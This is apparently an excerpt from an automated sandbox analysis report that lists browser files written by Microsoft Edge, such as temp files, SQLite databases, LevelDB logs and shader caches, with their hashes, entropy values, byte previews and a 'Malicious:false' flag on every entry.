                                                                                                                                                                                                                                                                                                                            SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\abca3fd8-6373-4034-9817-266d5ebb149a.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\af2a44fd-ec52-41b8-8ec2-a80ee9af89bc.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):11755
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                                            MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                                            SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                                            SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                                            SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                                            MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                                            SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                                            SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                                            SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e3faadc4-4ad6-43e3-a462-35cb2cc06fc2.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):40520
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.561150372842136
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:nT+f2HWSQ7pLGLhJvW5wFZf4lS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPAMdWIY10:nauH5cchJvWaFZfUSu1jaxMdsFtgAsvt
                                                                                                                                                                                                                                                                                                                            MD5:63F0756172CA7EA7B90A53CE6953C216
                                                                                                                                                                                                                                                                                                                            SHA1:E13C9C1F4F55DCE3EEE877135D58955F39614D6B
                                                                                                                                                                                                                                                                                                                            SHA-256:861EA491104BCD68825567245B5B5F2A61CDF557AF28B2BF0277FBD98DF407A4
                                                                                                                                                                                                                                                                                                                            SHA-512:0F8454A8A3B7F307631F075827A7293B66CB93A2C6971A313A0971F7BF3BBF13425617794F2AF8C45E9BF39EF69F69224787992913E5B14C7DAF2EE6BC7153FC
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380536355309336","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380536355309336","location":5,"ma

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, writer version 2, read version 2, file counter 8, database pages 11, cookie 0x7, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):45056
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.4603303976143812
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:TSWUYP5/ZrK/AxH1Aj5sAFWZmasamfDsCBjy8RZ6PWojcI5fc:TnUYVAKAFXX+LjcEc
                                                                                                                                                                                                                                                                                                                            MD5:B5DA1041AC145236112F096A59FDD1B2
                                                                                                                                                                                                                                                                                                                            SHA1:1BBF3217266CA16899899641C8D16608CCDBAF93
                                                                                                                                                                                                                                                                                                                            SHA-256:0431C9C6CF5F162B3C22DCD60AD457F34A2F2E7D1524E33DEF34E8066330A06F
                                                                                                                                                                                                                                                                                                                            SHA-512:A6B3B3D210B36E5356AA395005C8C01A7BFB1CA1B79C3A2391AC9D203024CF6DC91AA7A55B35B104970D6BAE1A6A56616E3D8DAED2DBC30ACF827F585C8292ED
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..................?.P................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.05422612853454573
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:GtStut7iHyDZStut7iHyDd//6R9XjhslotGLNl0ml/Vl/XoQXEl:MtmHGntmHGAL1EjVl/PvoQ
                                                                                                                                                                                                                                                                                                                            MD5:292C4174C0161F0E32D14BE8B0A93913
                                                                                                                                                                                                                                                                                                                            SHA1:4F2B9C17AF77D8307FF519D78E55DE5FFCEE84C4
                                                                                                                                                                                                                                                                                                                            SHA-256:8C66E94520807AA6D8D9D9B81495B09AC2738AE346CD9176A75E29564A07AB82
                                                                                                                                                                                                                                                                                                                            SHA-512:59D15CFA637DC5CA0B6ADBAA845F11F0CD6E71C9C8425809A39BB7345BCB4308AED531C738B8D81ECC319AF2ED6100058B60564B38D5E82C8A5AD5CD94BC9472
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:..-......................,./%...$J...V..|....p...-......................,./%...$J...V..|....p.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):86552
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.8706676984937854
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:eqzxjlO+H1qcbX+En9VAKAFXX+pRw2VAKAFXX+6xOqVAKAFXX+GnUYVAKAFXX+aS:e6xLV0xNs/cNswO5NshNsaS
                                                                                                                                                                                                                                                                                                                            MD5:98D1CF18C28C6AD3CEEC7651B8B8D01B
                                                                                                                                                                                                                                                                                                                            SHA1:DA500B30D167353262190F10A4AC006B3B3115B6
                                                                                                                                                                                                                                                                                                                            SHA-256:D17A6AA17F1A1A067842427D74BED043C3FB974623AF5ABDBF75F646BC89F5AA
                                                                                                                                                                                                                                                                                                                            SHA-512:7173BE71B5330BE6ABAC6EFDD8348ADA77E9AF9C100B3B4EA8877772AB2D3C84BEC7F497B265A726A5C327AFF85D5D3BFE824256829FB79E4D06327419D7B2C7
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):554
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):2.927488883401678
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:/XntM+Bcil3sedhO7yOuuuuuuuuuuuuuuuuuuuuuu:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuu
                                                                                                                                                                                                                                                                                                                            MD5:576E928A58B29421D5CDC9D1D2D40DD5
                                                                                                                                                                                                                                                                                                                            SHA1:AA4668F1E3AC8E70BD1DEDBEB8F664194791769D
                                                                                                                                                                                                                                                                                                                            SHA-256:991318A24B1CC5AE91B0FCE3378C9583C061AF30A07D8C4E5CA54985F73900B6
                                                                                                                                                                                                                                                                                                                            SHA-512:89F9E87915FD8BF3C0DB5E37F977DA059638AAC69AC0E75569BA85023249D9F9560EE892974AD62B3A95AD8998CD94CF103C0B3894B9CD789F8EC454D394BC13
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.179511226208206
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHSyq2PN723oH+TcwtfrK+IFUtt91ZmwDrRkwON723oH+TcwtfrUeLJ:7yyvVaYeb23FUtd/3R5OaYeb3J
                                                                                                                                                                                                                                                                                                                            MD5:5B943255F6148167900D701E52DEDDD5
                                                                                                                                                                                                                                                                                                                            SHA1:9AA041588C7004507544D32319E8C2D7372ACAC4
                                                                                                                                                                                                                                                                                                                            SHA-256:46D573DA6FA0A8AC69891733A85423BECBDE2871344AD6D3C1F9EDD95367EE9D
                                                                                                                                                                                                                                                                                                                            SHA-512:163B6DC5197AFA75FF46101C19D4A5C864B92B912C03F80F869CBA4225574ACD2951DE3E534AFA797845BBAD9EE0BBF123C0278149F27D79028235D0C7A609FD
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.041 1e34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/05-02:39:16.042 1e34 Recovering log #3.2025/01/05-02:39:16.042 1e34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.179511226208206
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHSyq2PN723oH+TcwtfrK+IFUtt91ZmwDrRkwON723oH+TcwtfrUeLJ:7yyvVaYeb23FUtd/3R5OaYeb3J
                                                                                                                                                                                                                                                                                                                            MD5:5B943255F6148167900D701E52DEDDD5
                                                                                                                                                                                                                                                                                                                            SHA1:9AA041588C7004507544D32319E8C2D7372ACAC4
                                                                                                                                                                                                                                                                                                                            SHA-256:46D573DA6FA0A8AC69891733A85423BECBDE2871344AD6D3C1F9EDD95367EE9D
                                                                                                                                                                                                                                                                                                                            SHA-512:163B6DC5197AFA75FF46101C19D4A5C864B92B912C03F80F869CBA4225574ACD2951DE3E534AFA797845BBAD9EE0BBF123C0278149F27D79028235D0C7A609FD
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:16.041 1e34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/05-02:39:16.042 1e34 Recovering log #3.2025/01/05-02:39:16.042 1e34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):928
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.0841566368719775
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sx3O5v:LYUtyp5q55NvIp8Sx3O5v
                                                                                                                                                                                                                                                                                                                            MD5:FFD773A32B54CE20C08561046A7359C3
                                                                                                                                                                                                                                                                                                                            SHA1:0457B60240313DE71285F57D99A505601FECA7EF
                                                                                                                                                                                                                                                                                                                            SHA-256:F0FF72019973430411A49A1B5BB5F2C3FBEAA8EAB418944ACB3295CB00DBBA50
                                                                                                                                                                                                                                                                                                                            SHA-512:D8EC47D415459BB850BF7973E9C7583E1A4F16B48216D185EC9CCE7739A641F79E5335B0286E428B51BB761B99C043A5D398D7C51274FC2E4A3BAF742D1EAF98
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .TN...................3_.....{-%z.................4_.....Z.\_.................3_.....5}...................4_.....

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):346
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.205464656495783
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfoSQupyq2PN723oH+TcwtfrzAdIFUttfoSWz1ZmwDfoSWlRkwON723oH+Tcwc:7/oSxpyvVaYeb9FUt9oSWZ/zoSWlR5Or
                                                                                                                                                                                                                                                                                                                            MD5:D17EA77F9BEC0018A888CCDE36C3A1A4
                                                                                                                                                                                                                                                                                                                            SHA1:B30D1C8EF9D487FD32B91D3859F37E871C113C85
                                                                                                                                                                                                                                                                                                                            SHA-256:7D110E580750CB39FA641FDE97A407367B70B1CD297969866AD53443ED660FB2
                                                                                                                                                                                                                                                                                                                            SHA-512:FB5455053A28367A2451D0CF6667B1E16203C2EAEC14719252A44E4AE149B09DF7F478E8EF4D054299293262505D84BF79833D0C90829183BA9C84F5B5B15177
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.975 1e34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/05-02:39:15.976 1e34 Recovering log #3.2025/01/05-02:39:15.976 1e34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):346
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.205464656495783
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:iOHfoSQupyq2PN723oH+TcwtfrzAdIFUttfoSWz1ZmwDfoSWlRkwON723oH+Tcwc:7/oSxpyvVaYeb9FUt9oSWZ/zoSWlR5Or
                                                                                                                                                                                                                                                                                                                            MD5:D17EA77F9BEC0018A888CCDE36C3A1A4
                                                                                                                                                                                                                                                                                                                            SHA1:B30D1C8EF9D487FD32B91D3859F37E871C113C85
                                                                                                                                                                                                                                                                                                                            SHA-256:7D110E580750CB39FA641FDE97A407367B70B1CD297969866AD53443ED660FB2
                                                                                                                                                                                                                                                                                                                            SHA-512:FB5455053A28367A2451D0CF6667B1E16203C2EAEC14719252A44E4AE149B09DF7F478E8EF4D054299293262505D84BF79833D0C90829183BA9C84F5B5B15177
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:2025/01/05-02:39:15.975 1e34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/05-02:39:15.976 1e34 Recovering log #3.2025/01/05-02:39:15.976 1e34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEjXyKl/:/M/xT02zsZt
                                                                                                                                                                                                                                                                                                                            MD5:B2F2F1733175EA2EE03BFBBB97ED86C9
                                                                                                                                                                                                                                                                                                                            SHA1:6CE61DE848264AD7849BB5A2B1E7B9870DE0A59F
                                                                                                                                                                                                                                                                                                                            SHA-256:4660D25B10A638EDCBF5FA76A7829162A2C103503FA7BB3B3E627420F0C38D05
                                                                                                                                                                                                                                                                                                                            SHA-512:A22F8444AD432480F57E6C88A85AC3E6A39E25283F7EC30B34680A2D4BE1ED1A7838D449FE78188112E8B319C615F11DC32E470E820379AB91C0B49A22AE70B7
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEjYN/:/M/xT02zH
                                                                                                                                                                                                                                                                                                                            MD5:51868FD5FBCEA77322FB69C8F5F4D643
                                                                                                                                                                                                                                                                                                                            SHA1:F21F01847973F20AC50D20731DDA91832EEB3005
                                                                                                                                                                                                                                                                                                                            SHA-256:54B2FD7ACFCE814D6EF8A0B8249925C4618FE69AE0308A08663C4EC9036B8A8A
                                                                                                                                                                                                                                                                                                                            SHA-512:53CA83AD6AC9200496937C879AFC57202F2E1F4F1FCBD17F5BA01CA2F20C51997478F6BB9197F0BDCBF74333780556201DAC45F5EF252458C8CDC961F8160A42
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):120
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.32524464792714
